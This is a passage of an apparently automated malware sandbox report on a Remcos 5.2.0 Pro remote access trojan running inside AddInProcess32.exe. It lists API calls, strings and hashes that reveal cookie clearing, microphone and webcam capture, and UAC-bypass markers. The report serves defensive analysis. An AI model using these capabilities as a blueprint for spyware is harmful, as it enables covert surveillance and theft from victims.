                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$AllocateHeap
                                                                                                  • String ID: KED
                                                                                                  • API String ID: 3033488037-2133951994
                                                                                                  • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                  • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                  Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                  Function 0040186A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                  • String ID: `kG$hMG$kG
                                                                                                  • API String ID: 1649129571-3851552405
                                                                                                  • Opcode ID: e7d59365cf8a2a51c340e4573cf07ad470a5e8a59a5c5c9771ed2099c48a02bd
                                                                                                  • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                  • Opcode Fuzzy Hash: e7d59365cf8a2a51c340e4573cf07ad470a5e8a59a5c5c9771ed2099c48a02bd
                                                                                                  • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                  • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                                                                                  • API String ID: 37874593-930133217
                                                                                                  • Opcode ID: 98e5383603199a3ae91f152b580e0980a92f5ba97d9c345e2d64d7e8863b9e47
                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                  • Opcode Fuzzy Hash: 98e5383603199a3ae91f152b580e0980a92f5ba97d9c345e2d64d7e8863b9e47
                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                  • Opcode ID: 54b94032e9b78d2850e67281325c2d043173ec5e1355e0856bf4db78674b4992
                                                                                                  • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                                                                  • Opcode Fuzzy Hash: 54b94032e9b78d2850e67281325c2d043173ec5e1355e0856bf4db78674b4992
                                                                                                  • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                                                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                  • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                  Function 00401A6D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                                                                  • waveInStart.WINMM ref: 00401B82
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                  • String ID: tMG
                                                                                                  • API String ID: 1356121797-30866661
                                                                                                  • Opcode ID: ddb26006271a9d09e5c3e06fd94c49a09c7a5bd56704e6a9c07e47a6c47e01e4
                                                                                                  • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                                                                  • Opcode Fuzzy Hash: ddb26006271a9d09e5c3e06fd94c49a09c7a5bd56704e6a9c07e47a6c47e01e4
                                                                                                  • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                                                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                  • String ID: 8mG
                                                                                                  • API String ID: 2536120697-3990007011
                                                                                                  • Opcode ID: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                                                                  • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                  • Opcode Fuzzy Hash: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                                                                  • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                  Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                  • API String ID: 1866151309-2070987746
                                                                                                  • Opcode ID: e319b20e713963962fae3f4f0dede7e3a320de8ef4d9594bff63017ef53802f1
                                                                                                  • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                                                                  • Opcode Fuzzy Hash: e319b20e713963962fae3f4f0dede7e3a320de8ef4d9594bff63017ef53802f1
                                                                                                  • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE
                                                                                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                  • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040760B
                                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                  • API String ID: 3851391207-3324213274
                                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                  Strings
                                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                  • API String ID: 2018770650-304995407
                                                                                                  • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                  • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                  Function 0041CE2C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Console$AllocOutputShowWindow
                                                                                                  • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                                                                                  • API String ID: 2425139147-793934204
                                                                                                  • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                  • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                  • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                  • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                  Function 0040729B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • 0SG, xrefs: 00407715
                                                                                                  • RG, xrefs: 004076DF
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 004076FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$RG
                                                                                                  • API String ID: 0-2653435807
                                                                                                  • Opcode ID: 6266df8f63f07d9ec3e284de14b260bcf750c81262affdfdd67307fbc2c8eb3d
                                                                                                  • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                                                                                  • Opcode Fuzzy Hash: 6266df8f63f07d9ec3e284de14b260bcf750c81262affdfdd67307fbc2c8eb3d
                                                                                                  • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                                                                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                  • __allrem.LIBCMT ref: 0043AD51
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1992179935-0
                                                                                                  • Opcode ID: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                  • Opcode Fuzzy Hash: 52068ab3a7cfe922dfe01ed446ba536eb0656cd97dd847f62b494b0202e28e08
                                                                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: H_prologSleep
                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                                                                  • API String ID: 3469354165-985523790
                                                                                                  • Opcode ID: 4df218fd7deca31707e20cb0c84980cf95b97fad70d0848b7f6c12c419eef87e
                                                                                                  • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                                                                  • Opcode Fuzzy Hash: 4df218fd7deca31707e20cb0c84980cf95b97fad70d0848b7f6c12c419eef87e
                                                                                                  • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                                                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3950776272-0
                                                                                                  • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                  • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
